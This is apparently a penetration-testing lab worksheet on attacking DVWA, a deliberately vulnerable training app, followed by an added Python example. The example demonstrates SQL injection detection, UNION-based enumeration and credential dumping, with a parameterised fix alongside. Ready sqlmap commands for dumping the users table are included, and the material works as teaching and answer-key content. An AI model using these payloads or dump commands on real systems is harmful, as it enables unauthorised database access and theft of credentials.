Week 9 Exercise (Gaining Access / Exploitation of Web Application)

Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application intended to help
penetration testers and security professionals test their skills and tools. It is an example PHP
application that is intentionally vulnerable to web attacks. As a penetration tester, you are
required to perform a Vulnerability Assessment and Penetration Testing (VAPT) exercise on this web
application using the tools and manual hacking skills you learned in the ITT320 lab session.

Based on your VAPT activity, answer the following questions.

a. Go to “http://IP_Address/dvwa/login.php” and log in using the default username admin
and default password password. Select “SQL Injection” from the menu on the left.

i. Perform a SQL Injection attack on DVWA and check whether the vulnerability is present.
Explain the output.

ii. List the users and passwords that are available in the database after performing a
SQL Injection attack.

(8 Marks)

b. Based on the web application vulnerability in (a), conduct a database exploitation on
“http://IP_Address/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” to
gain sensitive information.

i. What databases are available behind the above URL? (capture the sqlmap command
and its output as your answer)
ii. How many tables are available behind the above URL? (capture the sqlmap command
and its output as your answer)
iii. What is the name of the table that holds user details? (capture your answer)

(6 Marks)

c. List all usernames and passwords of the users of the application at the above URL.

(6 Marks)
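Worked example for parts (a) to (c). This is an added illustration, not part of the worksheet and not DVWA's own code: it rebuilds the low-security SQL Injection page in miniature, with the id parameter concatenated straight into the query, and runs the three steps of the exercise (detect, enumerate, dump) against an in-memory SQLite database instead of the lab's MySQL server. The user rows are constructed sample data modelled on DVWA's default users table, and sqlite_master stands in for the information_schema catalogue that the MySQL target exposes. The function names and the hardened safe_lookup are this example's own.

```python
# Added example, not part of the Week 9 worksheet or of DVWA itself.
# It rebuilds DVWA's low-security "SQL Injection" page in miniature: the id
# parameter is concatenated straight into the query, and the exercise's three
# steps (detect, enumerate, dump) are run against an in-memory SQLite database
# instead of the lab's MySQL server. Row contents are constructed sample data
# modelled on DVWA's default users table; password hashes are MD5 as in DVWA.
import hashlib
import sqlite3

# Constructed sample rows: (user_id, first_name, last_name, user, cleartext password)
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "password"),
    (2, "Gordon", "Brown", "gordonb", "abc123"),
    (3, "Hack", "Me", "1337", "charley"),
    (4, "Pablo", "Picasso", "pablo", "letmein"),
    (5, "Bob", "Smith", "smithy", "password"),
]


def md5_hex(text: str) -> str:
    """DVWA stores passwords as unsalted MD5 hex digests."""
    return hashlib.md5(text.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Create the users table and load the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [(uid, fn, ln, u, md5_hex(pw)) for uid, fn, ln, u, pw in SAMPLE_USERS],
    )
    con.commit()
    return con


def vulnerable_lookup(con: sqlite3.Connection, user_id: str) -> list:
    """Mirrors DVWA low security: the id parameter is spliced into the SQL text."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(query).fetchall()


def safe_lookup(con: sqlite3.Connection, user_id: str) -> list:
    """Hardened form: a bound parameter is data, never SQL, so payloads match nothing."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(query, (user_id,)).fetchall()


def is_injectable(con: sqlite3.Connection) -> bool:
    """Step (a)(i): boolean-based test. If a true and a false tautology appended
    to the same id give different results, the input is reaching the SQL parser."""
    rows_true = vulnerable_lookup(con, "1' AND '1'='1")
    rows_false = vulnerable_lookup(con, "1' AND '1'='2")
    return rows_true != rows_false


def list_tables(con: sqlite3.Connection) -> list:
    """Step (b): UNION against the catalogue. sqlite_master stands in for
    MySQL's information_schema.tables, which sqlmap queries on the real target.
    The trailing quote of the original query closes the 'table' literal."""
    payload = "' UNION SELECT name, type FROM sqlite_master WHERE type='table"
    return vulnerable_lookup(con, payload)


def dump_credentials(con: sqlite3.Connection) -> list:
    """Steps (a)(ii) and (c): UNION the two displayed columns with user/password.
    The WHERE '1'='1 tail reuses the query's closing quote, so no comment
    marker (# on MySQL, -- on SQLite) is needed."""
    payload = "' UNION SELECT user, password FROM users WHERE '1'='1"
    return vulnerable_lookup(con, payload)


if __name__ == "__main__":
    db = build_db()
    print("injectable:", is_injectable(db))
    print("all rows via tautology:", vulnerable_lookup(db, "1' OR '1'='1"))
    print("same payload, parameterised:", safe_lookup(db, "1' OR '1'='1"))
    print("tables:", list_tables(db))
    for user, pw_hash in dump_credentials(db):
        print(f"{user}:{pw_hash}")
```

On the real target, sqlmap automates exactly these steps: detection with the same true/false pairs, enumeration through information_schema, then the dump. Assuming a logged-in session (DVWA's PHPSESSID cookie, with the value copied from the browser) and the default database name dvwa, the commands that answer (b) and (c) are: sqlmap -u "http://IP_Address/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=<your session id>" --dbs for (b)(i); the same command with -D dvwa --tables for (b)(ii) and (b)(iii); and with -D dvwa -T users --dump for (c). Adding --batch accepts sqlmap's default answers to its prompts. The dumped passwords are MD5 hashes, as the example shows, not cleartext.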
